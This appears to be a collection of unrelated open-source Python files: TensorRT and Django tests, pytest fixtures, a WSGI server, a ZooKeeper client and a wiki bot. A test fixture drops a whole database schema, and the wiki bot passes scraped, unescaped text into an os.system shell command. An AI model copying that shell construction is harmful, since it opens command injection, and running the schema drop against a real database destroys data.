compatible_transpose, [0, 2, 3, 1], name="transposeback")
# Add an incompatible op so the first block will not be in the same
# subgraph where the following block belongs.
bridge = self.trt_incompatible_op(compatible_transpose)
# Add a block with incompatible transposes.
#
# Note: by default Grappler will run the TRT optimizer twice. At the
# first time it will group the two transpose ops below to same segment
# then fail the conversion due to the expected batch dimension problem.
# At the second time, since the input of bridge op is TRTEngineOp_0, it
# will fail to do shape inference which then cause conversion to fail.
# TODO(laigd): support shape inference, make TRT optimizer run only
# once, and fix this.
incompatible_transpose = array_ops.transpose(
bridge, [2, 1, 0, 3], name="transpose-2")
excluded_transpose = array_ops.transpose(
incompatible_transpose, [0, 2, 3, 1], name="transpose-3")
array_ops.identity(excluded_transpose, name=output_name)
return trt_test.TfTrtIntegrationTestParams(
gdef=g.as_graph_def(),
input_names=[input_name],
input_dims=[input_dims],
output_names=[output_name],
expected_output_dims=[(24, 100, 2, 24)])
def ExpectedEnginesToBuild(self, run_params):
"""Return the expected engines to build."""
return {
"TRTEngineOp_0": [
"transpose-1", "transpose-1/perm", "transposeback",
"transposeback/perm"
]
}
def ShouldRunTest(self, run_params):
"""Whether to run the test."""
return (not trt_test.IsQuantizationMode(run_params.precision_mode) and
not run_params.dynamic_engine)
if __name__ == "__main__":
test.main()
| hfp/tensorflow-xsmm | tensorflow/contrib/tensorrt/test/reshape_transpose_test.py | Python | apache-2.0 | 6,477 | 0.003705 |
import pytest
import sys
import logging
from sqlalchemy import create_engine
import zk.model.meta as zkmeta
import zkpylons.model.meta as pymeta
from zkpylons.config.routing import make_map
from paste.deploy import loadapp
from webtest import TestApp
from paste.fixture import Dummy_smtplib
from .fixtures import ConfigFactory
from ConfigParser import ConfigParser
# Get settings from config file, only need it once
ini = ConfigParser()
ini_filename = "test.ini"
ini.read(ini_filename)
# Logging displayed by passing -s to pytest
#logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)
@pytest.yield_fixture
def map():
config = {
'pylons.paths' : { 'controllers' : None },
'debug' : True,
}
yield make_map(config)
@pytest.yield_fixture
def app():
wsgiapp = loadapp('config:'+ini_filename, relative_to=".")
app = TestApp(wsgiapp)
yield app
class DoubleSession(object):
# There is an issue with the zkpylons -> zk migration
# Some files use zk.model, which uses zk.model.meta.Session
# Some files use zkpylons.model, which uses zkpylons.model.meta.Session
# Some files use relative paths, which means you can kinda guess at it
# The best way around this is to configure both Session objects
# But then operations frequently have to be applied to both
# This class wraps operations needed for testing, and applies both
def __init__(self, session1, session2):
self.s1 = session1
self.s2 = session2
def remove(self):
self.s1.remove()
self.s2.remove()
def configure(self, engine):
self.s1.configure(bind=engine)
self.s2.configure(bind=engine)
self.s1.configure(autoflush=False)
self.s2.configure(autoflush=False)
def commit(self):
self.s1.commit()
self.s2.commit()
# TODO: Maybe expire_all or refresh would be better
def expunge_all(self):
self.s1.expunge_all()
self.s2.expunge_all()
def query(self, cls):
return self.s1.query(cls)
def execute(self, *args, **kwargs):
return self.s1.execute(*args, **kwargs)
base_general_config = {
'sponsors' : {"top":[],"slideshow":[]},
'account_creation' : True,
'cfp_status' : "open",
'conference_status' : "open",
}
base_rego_config = {
'personal_info' : {"phone":"yes","home_address":"yes"}
}
@pytest.yield_fixture
def db_session():
# Set up SQLAlchemy to provide DB access
dsess = DoubleSession(zkmeta.Session, pymeta.Session)
# Clean up old sessions if they exist
dsess.remove()
engine = create_engine(ini.get("app:main", "sqlalchemy.url"))
# Drop all data to establish known state, mostly to prevent primary-key conflicts
engine.execute("drop schema if exists public cascade")
engine.execute("create schema public")
zkmeta.Base.metadata.create_all(engine)
dsess.configure(engine)
# Create basic config values, to allow basic pages to render
for key, val in base_general_config.iteritems():
ConfigFactory(key=key, value=val)
for key, val in base_rego_config.iteritems():
ConfigFactory(category='rego', key=key, value=val)
dsess.commit()
# Run the actual test
yield dsess
# No rollback, for functional tests we have to actually commit to DB
@pytest.yield_fixture
def smtplib():
Dummy_smtplib.install()
yield Dummy_smtplib
if Dummy_smtplib.existing:
Dummy_smtplib.existing.reset()
| zookeepr/zookeepr | zkpylons/tests/functional/conftest.py | Python | gpl-2.0 | 3,543 | 0.007056 |
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
TRANSACTION_STATUS = (
('P', _('pending')),
('F', _('failed')),
('C', _('complete')),
)
class Transaction(models.Model):
user = models.ForeignKey(User, blank = True, null = True, default = None,
verbose_name = _("user"), help_text = _("user who started transaction"))
description = models.CharField(_("reference description"), max_length = 255, help_text = _("reference description"))
amount = models.FloatField(_("amount"))
currency = models.CharField(_("currency"), max_length = 3)
details = models.CharField(_("details"), max_length = 255, help_text = _("payment details"))
created = models.DateTimeField(auto_now_add = True)
last_modified = models.DateTimeField(auto_now = True)
status = models.CharField(_("status"), max_length = 1, default = 'P')
redirect_after_success = models.CharField(max_length = 255, editable = False)
redirect_on_failure = models.CharField(max_length = 255, editable = False)
def __unicode__(self):
return _("transaction %s " % self.pk)
class Meta:
verbose_name = _("transaction")
ordering = ['-last_modified']
| truevision/django_banklink | django_banklink/models.py | Python | bsd-3-clause | 1,291 | 0.035631 |
# coding=utf-8
''' tagsPlorer package entry point (C) 2021-2021 Arne Bachmann https://github.com/ArneBachmann/tagsplorer '''
from tagsplorer import tp
tp.Main().parse_and_run() | ArneBachmann/tagsplorer | tagsplorer/__main__.py | Python | mpl-2.0 | 183 | 0.010929 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-25 23:55
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('journal', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='JournalEntryTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64, verbose_name='Name')),
],
),
migrations.AddField(
model_name='journalentry',
name='tags',
field=models.ManyToManyField(blank=True, to='journal.JournalEntryTag', verbose_name='Tags this entry has'),
),
]
| diegojromerolopez/djanban | src/djanban/apps/journal/migrations/0002_auto_20160926_0155.py | Python | mit | 819 | 0.002442 |
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2017, UFactory, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.wen@ufactory.cc>
import os
from distutils.util import convert_path
try:
from setuptools import setup, find_packages
except ImportError:
from distutils.core import setup
def find_packages(base_path='.'):
base_path = convert_path(base_path)
found = []
for root, dirs, files in os.walk(base_path, followlinks=True):
dirs[:] = [d for d in dirs if d[0] != '.' and d not in ('ez_setup', '__pycache__')]
relpath = os.path.relpath(root, base_path)
parent = relpath.replace(os.sep, '.').lstrip('.')
if relpath != '.' and parent not in found:
# foo.bar package but no foo package, skip
continue
for dir in dirs:
if os.path.isfile(os.path.join(root, dir, '__init__.py')):
package = '.'.join((parent, dir)) if parent else dir
found.append(package)
return found
main_ns = {}
ver_path = convert_path('xarm/version.py')
with open(os.path.join(os.getcwd(), ver_path)) as ver_file:
exec(ver_file.read(), main_ns)
version = main_ns['__version__']
# long_description = open('README.rst').read()
long_description = 'long description for xArm-Python-SDK'
with open(os.path.join(os.getcwd(), 'requirements.txt')) as f:
requirements = f.read().splitlines()
setup(
name='xArm-Python-SDK',
version=version,
author='Vinman',
description='Python SDK for xArm',
packages=find_packages(),
author_email='vinman@ufactory.cc',
install_requires=requirements,
long_description=long_description,
license='MIT',
zip_safe=False
)
| xArm-Developer/xArm-Python-SDK | setup.py | Python | bsd-3-clause | 1,795 | 0.000557 |
import json
import base64
from django.test import TestCase
from django.core.urlresolvers import reverse
from django.conf import settings
from ..views import register, agents
from ..models import Agent
class AgentTests(TestCase):
@classmethod
def setUpClass(cls):
print "\n%s" % __name__
def setUp(self):
self.username = "tester"
self.password = "test"
self.email = "test@example.com"
self.auth = "Basic %s" % base64.b64encode("%s:%s" % (self.username, self.password))
form = {'username':self.username,'password':self.password,'password2':self.password, 'email':self.email}
self.client.post(reverse(register),form, X_Experience_API_Version=settings.XAPI_VERSION)
def test_get_no_agents(self):
agent = json.dumps({"name":"me","mbox":"mailto:me@example.com"})
response = self.client.get(reverse(agents), {'agent':agent}, Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)
self.assertEqual(response.status_code, 404)
self.assertEqual(response.content, "Error with Agent. The agent partial did not match any agents on record")
def test_get(self):
a = json.dumps({"name":"me","mbox":"mailto:me@example.com"})
Agent.objects.retrieve_or_create(**json.loads(a))
response = self.client.get(reverse(agents), {'agent':a}, Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)
r_data = json.loads(response.content)
self.assertTrue(isinstance(r_data['mbox'], list))
self.assertTrue(isinstance(r_data['name'], list))
self.assertEqual(r_data['mbox'], ['mailto:me@example.com'])
self.assertEqual(r_data['name'], ['me'])
self.assertEqual(r_data['objectType'], 'Person')
self.assertIn('content-length', response._headers)
def test_get_no_existing_agent(self):
a = json.dumps({"mbox":"mailto:fail@fail.com"})
response = self.client.get(reverse(agents), {'agent':a}, Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)
self.assertEqual(response.content, 'Error with Agent. The agent partial did not match any agents on record')
self.assertEqual(response.status_code, 404)
def test_head(self):
a = json.dumps({"name":"me","mbox":"mailto:me@example.com"})
Agent.objects.retrieve_or_create(**json.loads(a))
response = self.client.head(reverse(agents), {'agent':a}, Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)
self.assertEqual(response.content, '')
self.assertIn('content-length', response._headers)
def test_get_no_agent(self):
response = self.client.get(reverse(agents), Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)
self.assertEqual(response.status_code, 400)
def test_post(self):
agent = json.dumps({"name":"me","mbox":"mailto:me@example.com"})
response = self.client.post(reverse(agents), {'agent':agent},content_type='application/x-www-form-urlencoded', Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)
self.assertEqual(response.status_code, 405) | frasern/ADL_LRS | lrs/tests/AgentTests.py | Python | apache-2.0 | 3,199 | 0.012504 |
# -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
# This file is part of Guadalinex
#
# This software is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this package; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
__author__ = "Antonio Hernández <ahernandez@emergya.com>"
__copyright__ = "Copyright (C) 2011, Junta de Andalucía <devmaster@guadalinex.org>"
__license__ = "GPL-2"
from gi.repository import Gtk
from gi.repository import GObject
from . helpers import get_builder, show_uri, get_help_uri
# This class is meant to be subclassed by FirstbootWindow. It provides
# common functions and some boilerplate.
class Window(Gtk.Window):
__gtype_name__ = "Window"
# To construct a new instance of this method, the following notable
# methods are called in this order:
# __new__(cls)
# __init__(self)
# finish_initializing(self, builder)
# __init__(self)
#
# For this reason, it's recommended you leave __init__ empty and put
# your initialization code in finish_initializing
def __init__(self):
GObject.GObject.__init__(self)
def __new__(cls):
"""Special static method that's automatically called by Python when
constructing a new instance of this class.
Returns a fully instantiated BaseFirstbootWindow object.
"""
builder = get_builder(cls.__gtype_name__)
new_object = builder.get_object(cls.__gtype_name__)
new_object._finish_initializing(builder)
return new_object
def _finish_initializing(self, builder):
"""Called while initializing this instance in __new__
finish_initializing should be called after parsing the UI definition
and creating a FirstbootWindow object with it in order to finish
initializing the start of the new FirstbootWindow instance.
"""
# Get a reference to the builder and set up the signals.
self.builder = builder
self.ui = builder.get_ui(self, True)
self.connect("delete_event", self.on_delete_event)
self.translate()
self.finish_initializing(builder)
def finish_initializing(self, builder):
pass
def on_destroy(self, widget, data=None):
"""Called when the FirstbootWindow is closed."""
# Clean up code for saving application state should be added here.
Gtk.main_quit()
def on_delete_event(self, widget, data=None):
return False
def translate():
pass
| gecos-team/gecosws-agent | gecosfirstlogin_lib/Window.py | Python | gpl-2.0 | 3,073 | 0.000651 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2014 emijrp
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import catlib
import os
import pagegenerators
import re
import urllib
import wikipedia
"""
Hace algunos reemplazos básicos en páginas de círculos de Podemos
y sube la imagen del círculo, si está en Twitter.
"""
def main():
site = wikipedia.Site('15mpedia', '15mpedia')
cat = catlib.Category(site, u"Category:Círculos de Podemos")
gen = pagegenerators.CategorizedPageGenerator(cat)
pre = pagegenerators.PreloadingGenerator(gen, pageNumber=60)
for page in pre:
wtitle = page.title()
wtext = page.get()
if not re.search(ur"(?im)\{\{\s*Infobox Nodo", wtext):
continue
print '\n===', wtitle, '==='
newtext = wtext
suffix = ' '.join(wtitle.split(' ')[1:])
if re.search(ur"(?im)\{\{\s*nodos\s*\}\}", newtext) and not re.search(ur"(?im)\{\{\s*podemos\s*\}\}", newtext):
newtext = re.sub(ur"(?im)\{\{\s*nodos\s*\}\}", ur"{{podemos}}", newtext)
if re.search(ur"(?im)^'''([^\']+)''' es un \[\[nodo\]\]( de \[\[Podemos\]\])?\.", newtext):
newtext = re.sub(ur"(?im)^'''([^\']+)''' es un \[\[nodo\]\](?: de \[\[Podemos\]\])?\.", ur"'''\1''' es un [[Lista de círculos de Podemos|círculo]] de [[Podemos]] de [[%s]]." % (suffix), newtext)
if re.search(ur"(?im)== Enlaces externos ==\s*\*[^\r\n]+\r\n", newtext):
newtext = re.sub(ur"(?im)== Enlaces externos ==\s*\*[^\r\n]+\r\n", ur"== Enlaces externos ==\n{{enlaces externos}}\n", newtext)
newtext = re.sub(ur"(?im)\[\[Categoría:Podemos\]\]", ur"", newtext)
newtext = re.sub(ur"(?im)\[\[Categoría:Nodos\]\]", ur"[[Categoría:Círculos de Podemos|%s]]" % (suffix), newtext)
newtext = re.sub(ur"(?im)\[\[Categoría:Círculos de Podemos\]\]", ur"[[Categoría:Círculos de Podemos|%s]]" % (suffix), newtext)
newtext = re.sub(ur"(?im)== Véase también ==\r\n\* \[\[Lista de nodos de Podemos\]\]\r\n\r\n", ur"== Véase también ==\n* [[Podemos]]\n* [[Lista de círculos de Podemos]]\n\n", newtext)
if wtext != newtext:
wikipedia.showDiff(wtext, newtext)
page.put(newtext, u"BOT - Unificando círculos")
#imagen
if not re.search(ur"(?im)\|\s*imagen\s*=", newtext):
twitter = re.findall(ur"(?im)\|\s*twitter\s*=([^\r\n]+)\r\n", newtext)
if twitter:
twitter = twitter[0].split(',')[0].strip()
f = urllib.urlopen("https://twitter.com/%s" % twitter)
html = unicode(f.read(), 'utf-8')
imageurl = re.findall(ur"data-resolved-url-large=\"(https://pbs.twimg.com/profile_images/[^\"]+)\"", html)
if imageurl:
imageurl = imageurl[0]
if 'default_profile' in imageurl:
print 'Default twitter image, skiping'
continue
desc = u"{{Infobox Archivo\n|embebido id=\n|embebido usuario=\n|embebido título=\n|descripción=Logotipo de [[%s]].\n|fuente={{twitter|%s}}\n}}" % (wtitle, twitter)
if imageurl.endswith('jpeg') or imageurl.endswith('jpg'):
ext = 'jpg'
elif imageurl.endswith('pneg') or imageurl.endswith('png'):
ext = 'png'
else:
print 'Twitter image extension is %s, skiping' % (imageurl.split('.')[-1])
continue
imagename = u"%s.%s" % (wtitle, ext)
#https://www.mediawiki.org/wiki/Manual:Pywikibot/upload.py
os.system('python upload.py -lang:15mpedia -family:15mpedia -keep -filename:"%s" -noverify "%s" "%s"' % (imagename.encode('utf-8'), imageurl.encode('utf-8'), desc.encode('utf-8')))
newtext = re.sub(ur"(?im)\{\{Infobox Nodo", ur"{{Infobox Nodo\n|imagen=%s" % (imagename), newtext)
wikipedia.showDiff(wtext, newtext)
page.put(newtext, u"BOT - Añadiendo imagen")
if __name__ == '__main__':
main()
| 15Mpedia/15Mpedia-scripts | completa-circulos-podemos.py | Python | gpl-3.0 | 4,844 | 0.020544 |
GnomeXzPackage ('atk', version_major = '2.16', version_minor = '0')
| BansheeMediaPlayer/bockbuild | packages/atk.py | Python | mit | 68 | 0.073529 |
# Copyright 2012 - 2013 Zarafa B.V.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License, version 3,
# as published by the Free Software Foundation with the following additional
# term according to sec. 7:
#
# According to sec. 7 of the GNU Affero General Public License, version
# 3, the terms of the AGPL are supplemented with the following terms:
#
# "Zarafa" is a registered trademark of Zarafa B.V. The licensing of
# the Program under the AGPL does not imply a trademark license.
# Therefore any rights, title and interest in our trademarks remain
# entirely with us.
#
# However, if you propagate an unmodified version of the Program you are
# allowed to use the term "Zarafa" to indicate that you distribute the
# Program. Furthermore you may use our trademarks where it is necessary
# to indicate the intended purpose of a product or service provided you
# use it in accordance with honest practices in industrial or commercial
# matters. If you want to propagate modified versions of the Program
# under the name "Zarafa" or "Zarafa Server", you may only do so if you
# have a written permission by Zarafa B.V. (to acquire a permission
# please contact Zarafa at trademark@zarafa.com).
#
# The interactive user interface of the software displays an attribution
# notice containing the term "Zarafa" and/or the logo of Zarafa.
# Interactive user interfaces of unmodified and modified versions must
# display Appropriate Legal Notices according to sec. 5 of the GNU
# Affero General Public License, version 3, when you propagate
# unmodified or modified versions of the Program. In accordance with
# sec. 7 b) of the GNU Affero General Public License, version 3, these
# Appropriate Legal Notices must retain the logo of Zarafa or display
# the words "Initial Development by Zarafa" if the display of the logo
# is not reasonably feasible for technical reasons. The use of the logo
# of Zarafa in Legal Notices is allowed for unmodified and modified
# versions of the software.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from libzsm.rest_client.utils import get_api
from libzsm.rest_client.exc import Http403
from common import ApiTestBase
class AuthorizationTest(ApiTestBase):
def __init__(self, *args, **kwargs):
super(AuthorizationTest, self).__init__(*args, **kwargs)
self.s = get_api()
def setUp(self):
''' Trans [Harry (adm), Jeeves] # NOQA
# NOQA
| # NOQA
v # NOQA
# NOQA
Wheels [Rob] -> Cars [Jack] # NOQA
# NOQA
| # NOQA
v # NOQA
# NOQA
Bikes [Harry] # NOQA
# NOQA
Refer to the diagram:
https://confluence.zarafa.com/pages/viewpage.action?pageId=20841313
'''
## Hank is a tenant admin
data = dict(
name=u'trans',
)
self.ten_trans = self.s.create_tenant(initial=data)
data = dict(
username=u'hank',
password=u'nk',
name=u'Hank',
surname=u'R',
tenant=self.ten_trans,
userServer=self.server1,
)
self.trans_hank = self.s.create_user(initial=data)
data = {
'permissions': [
'ViewContact',
'ViewGroup',
'ViewGroupPrivileges',
'ViewTenant',
'ViewTenantAcl',
'ViewUser',
'ViewUserPrivileges',
'WriteContact',
'WriteGroup',
'WriteGroupPrivileges',
'WriteTenant',
'WriteTenantAcl',
'WriteUser',
'WriteUserPrivileges',
],
'user': self.trans_hank.resourceUri,
}
self.s.add_tenant_ace(self.ten_trans, data)
data = [
u'CreateTenant',
]
self.s.put_user_privs(self.trans_hank, data)
self.s_trans_hank = self.s.get_session(self.trans_hank)
## Jeeves is Hank's butler
data = dict(
username=u'jeeves',
password=u'jv',
name=u'Jeeves',
surname=u'H',
tenant=self.ten_trans,
userServer=self.server1,
)
self.trans_jeeves = self.s_trans_hank.create_user(initial=data)
self.s_trans_jeeves = self.s.get_session(self.trans_jeeves)
## Trans has a customer Wheels with a user Rob
data = dict(
name=u'wheels',
)
self.ten_wheels = self.s_trans_hank.create_tenant(initial=data)
data = dict(
username=u'rob',
password=u'rb',
name=u'Rob',
surname=u'Dole',
tenant=self.ten_wheels,
userServer=self.server1,
)
self.wheels_rob = self.s_trans_hank.create_user(initial=data)
data = [
u'CreateTenant',
]
self.s_trans_hank.put_user_privs(self.wheels_rob, data)
self.s_wheels_rob = self.s.get_session(self.wheels_rob)
## Wheels has a customer Bikes with a user Harry
data = dict(
name=u'bikes',
)
self.ten_bikes = self.s_wheels_rob.create_tenant(initial=data)
data = dict(
username=u'harry',
password=u'hr',
name=u'Harry',
surname=u'W',
tenant=self.ten_bikes,
userServer=self.server1,
)
self.bikes_harry = self.s_wheels_rob.create_user(initial=data)
self.s_bikes_harry = self.s.get_session(self.bikes_harry)
## Wheels has a customer Cars with a user Jack
data = dict(
name=u'cars',
)
self.ten_cars = self.s_wheels_rob.create_tenant(initial=data)
data = dict(
username=u'jack',
password=u'jk',
name=u'Jack',
surname=u'Hicks',
tenant=self.ten_cars,
userServer=self.server1,
)
self.cars_jack = self.s_wheels_rob.create_user(initial=data)
self.s_cars_jack = self.s.get_session(self.cars_jack)
## Set some handy groupings
self.all_tenants = [
self.ten_trans,
self.ten_wheels,
self.ten_bikes,
self.ten_cars,
]
def tearDown(self):
self.s_wheels_rob.delete_tenant(self.ten_bikes)
self.s_wheels_rob.delete_tenant(self.ten_cars)
self.s_trans_hank.delete_tenant(self.ten_wheels)
self.s.delete_tenant(self.ten_trans)
def test_neg_tenant_access(self):
## Hank only sees the tenants he created
tens = self.s_trans_hank.all_tenant()
self.assertEqual(2, len(tens), u'Incorrect number of tenants.')
self.verify_iterable(tens, [self.ten_trans, self.ten_wheels])
## Jeeves sees no tenants
tens = self.s_trans_jeeves.all_tenant()
self.assertEqual(0, len(tens), u'Incorrect number of tenants.')
## Rob sees Bikes and Cars
tens = self.s_wheels_rob.all_tenant()
self.assertEqual(2, len(tens), u'Incorrect number of tenants.')
self.verify_iterable(tens, [self.ten_bikes, self.ten_cars])
## Harry sees no tenants
tens = self.s_bikes_harry.all_tenant()
self.assertEqual(0, len(tens), u'Incorrect number of tenants.')
## Jack sees no tenants
tens = self.s_cars_jack.all_tenant()
self.assertEqual(0, len(tens), u'Incorrect number of tenants.')
## Hank can access Trans and Wheels, not Bikes or Cars
self.s_trans_hank.get_tenant(id=self.ten_trans.id)
self.s_trans_hank.get_tenant(id=self.ten_wheels.id)
with self.assertRaises(Http403):
self.s_trans_hank.get_tenant(id=self.ten_bikes.id)
with self.assertRaises(Http403):
self.s_trans_hank.get_tenant(id=self.ten_cars.id)
## Rob cannot access Trans nor Wheels, only Bikes and Cars
with self.assertRaises(Http403):
self.s_wheels_rob.get_tenant(id=self.ten_trans.id)
with self.assertRaises(Http403):
self.s_wheels_rob.get_tenant(id=self.ten_wheels.id)
self.s_wheels_rob.get_tenant(id=self.ten_bikes.id)
self.s_wheels_rob.get_tenant(id=self.ten_cars.id)
## Jeeves, Harry and Jack cannot access any tenants
sessions = [
self.s_trans_jeeves,
self.s_bikes_harry,
self.s_cars_jack,
]
for session in sessions:
for tenant in self.all_tenants:
with self.assertRaises(Http403):
session.get_tenant(id=tenant.id)
def test_neg_tenant_creation(self):
## Jeeves, Harry and Jack cannot create tenants
sessions = [
self.s_trans_jeeves,
self.s_bikes_harry,
self.s_cars_jack,
]
for session in sessions:
with self.assertRaises(Http403):
data = dict(
name=u'dummy',
)
session.create_tenant(initial=data)
def test_neg_user_access(self):
## Jeeves, Harry and Jack cannot access users on any tenant
sessions = [
self.s_trans_jeeves,
self.s_bikes_harry,
self.s_cars_jack,
]
for session in sessions:
for tenant in self.all_tenants:
with self.assertRaises(Http403):
session.all_user(tenant=tenant)
## Jeeves, Harry and Jack cannot create users on any tenant
sessions = [
self.s_trans_jeeves,
self.s_bikes_harry,
self.s_cars_jack,
]
for session in sessions:
for tenant in self.all_tenants:
with self.assertRaises(Http403):
data = dict(
username=u'dummy',
name=u'Dummy',
surname=u'H',
tenant=tenant,
userServer=self.server1,
)
session.create_user(initial=data)
## Rob cannot create users in Wheels
with self.assertRaises(Http403):
data = dict(
username=u'dummy',
name=u'Dummy',
surname=u'H',
tenant=self.ten_wheels,
userServer=self.server1,
)
self.s_wheels_rob.create_user(initial=data)
| zarafagroupware/zarafa-zsm | tests/tests_authorization.py | Python | agpl-3.0 | 11,327 | 0.002472 |
class Solution(object):
def numIslands(self, grid):
"""
:type grid: List[List[str]]
:rtype: int
"""
count = 0
for r in range(len(grid)):
for c in range(len(grid[0])):
if grid[r][c] == "1":
self.clearIsland(grid, r, c)
count += 1
return count
def clearIsland(self, grid, r, c):
grid[r][c] = "0"
if r > 0 and grid[r - 1][c] == "1":
self.clearIsland(grid, r - 1, c)
if r < len(grid) - 1 and grid[r + 1][c] == "1":
self.clearIsland(grid, r + 1, c)
if c > 0 and grid[r][c - 1] == "1":
self.clearIsland(grid, r, c - 1)
if c < len(grid[0]) - 1 and grid[r][c + 1] == "1":
self.clearIsland(grid, r, c + 1)
return
| Jspsun/LEETCodePractice | Python/NumberOfIslands.py | Python | mit | 834 | 0 |
import sys
from io import BytesIO
from whoops.httplib.http_server import HttpServer
from whoops import ioloop
class WSGIServer(HttpServer):
def __init__(self, ioloop, address):
super(WSGIServer, self).__init__(ioloop, address)
self.app = None
self.environ = None
self.result = None
self.cgi_environ = None
self.http_version = "HTTP/1.1"
self.wsgi_version = (1, 0)
self.wsgi_multithread = True
self.wsgi_multiprocess = False
self.wsgi_run_once = False
def set_app(self, app):
self.app = app
def on_connection(self, conn):
self.connection = conn
self.parse_request()
self.setup_environ()
self.result = self.app(self.environ, self.start_response)
self.finish_response()
def setup_cgi_environ(self):
env = {}
request_line = self.raw_requestline.decode("latin-1").rstrip("\r\n")
method, path, version = request_line.split(" ")
if "?" in path:
_path, query_string = path.split("?")
env["QUERY_STRING"] = query_string
env["REQUEST_METHOD"] = method
env["PATH_INFO"] = path
env["SERVER_PROTOCOL"] = self.http_version
env["SERVER_HOST"] = self.host
env["SERVER_PORT"] = self.port
if "content-type" in self.header:
env["CONTENT_TYPE"] = self.header.get("content-type")
if "content-length" in self.header:
env["CONTENT_LENGTH"] = self.header.get("content-length")
for key, value in self.header.items():
env["HTTP_" + key.replace("-", "_").upper()] = value
self.cgi_environ = env
def setup_environ(self):
self.setup_cgi_environ()
env = self.environ = self.cgi_environ.copy()
env["wsgi.input"] = BytesIO(self.request_body)
env["wsgi.errors"] = sys.stdout
env["wsgi.version"] = self.wsgi_version
env["wsgi.run_once"] = self.wsgi_run_once
env["wsgi.url_scheme"] = "http"
env["wsgi.multithread"] = self.wsgi_multithread
env["wsgi.wsgi_multiprocess"] = self.wsgi_multiprocess
def start_response(self, status, headers, exc_info=None):
code = int(status[0:3])
message = str(status[4:])
self.send_response(code, message)
self.ioloop.logger.info(
self.cgi_environ["PATH_INFO"] + " %s %d %s" % ("HTTP/1.1", code, message)
)
self.need_content_length = True
for name, val in headers:
if name == "Content-Length":
self.need_content_length = False
self.send_header(name, val)
self.send_header("Date", self.date_string())
if code == 304:
self.need_content_length = False
def finish_response(self):
if self.need_content_length:
content_length = 0
for data in self.result:
content_length += len(data)
self.send_header("Content-Length", content_length)
self.end_headers()
for data in self.result:
self.send(data)
def make_server(host, port, app):
server = WSGIServer(ioloop.IOLoop.instance(num_backends=1000), (host, port))
server.set_app(app)
return server
| jasonlvhit/whoops | whoops/wsgilib/wsgi_server.py | Python | mit | 3,279 | 0.00061 |
# (C) Datadog, Inc. 2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# std
import logging
from kazoo.client import KazooClient, NoNodeError
from utils.service_discovery.abstract_config_store import AbstractConfigStore, KeyNotFound
DEFAULT_ZK_HOST = '127.0.0.1'
DEFAULT_ZK_PORT = 2181
DEFAULT_TIMEOUT = 5
log = logging.getLogger(__name__)
class ZookeeperStore(AbstractConfigStore):
"""Implementation of a config store client for Zookeeper"""
def _extract_settings(self, config):
"""Extract settings from a config object"""
settings = {
'host': config.get('sd_backend_host', DEFAULT_ZK_HOST),
'port': int(config.get('sd_backend_port', DEFAULT_ZK_PORT)),
}
return settings
def get_client(self, reset=False):
if self.client is None or reset is True:
self.client = KazooClient(
hosts=self.settings.get('host') + ":" + str(self.settings.get('port')),
read_only=True,
)
self.client.start()
return self.client
def client_read(self, path, **kwargs):
"""Retrieve a value from a Zookeeper key."""
try:
if kwargs.get('watch', False):
return self.recursive_mtime(path)
elif kwargs.get('all', False):
# we use it in _populate_identifier_to_checks
results = []
self.recursive_list(path, results)
return results
else:
res, stats = self.client.get(path)
return res.decode("utf-8")
except NoNodeError:
raise KeyNotFound("The key %s was not found in Zookeeper" % path)
def recursive_list(self, path, results):
"""Recursively walks the children from the given path and build a list of key/value tuples"""
try:
data, stat = self.client.get(path)
if data:
node_as_string = data.decode("utf-8")
if not node_as_string:
results.append((path.decode("utf-8"), node_as_string))
children = self.client.get_children(path)
if children is not None:
for child in children:
new_path = '/'.join([path.rstrip('/'), child])
self.recursive_list(new_path, results)
except NoNodeError:
raise KeyNotFound("The key %s was not found in Zookeeper" % path)
def recursive_mtime(self, path):
"""Recursively walks the children from the given path to find the maximum modification time"""
try:
data, stat = self.client.get(path)
children = self.client.get_children(path)
if children is not None and len(children) > 0:
for child in children:
new_path = '/'.join([path.rstrip('/'), child])
return max(stat.mtime, self.recursive_mtime(new_path))
else:
return stat.mtime
except NoNodeError:
raise KeyNotFound("The key %s was not found in Zookeeper" % path)
def dump_directory(self, path, **kwargs):
"""Return a dict made of all image names and their corresponding check info"""
templates = {}
paths = []
self.recursive_list(path, paths)
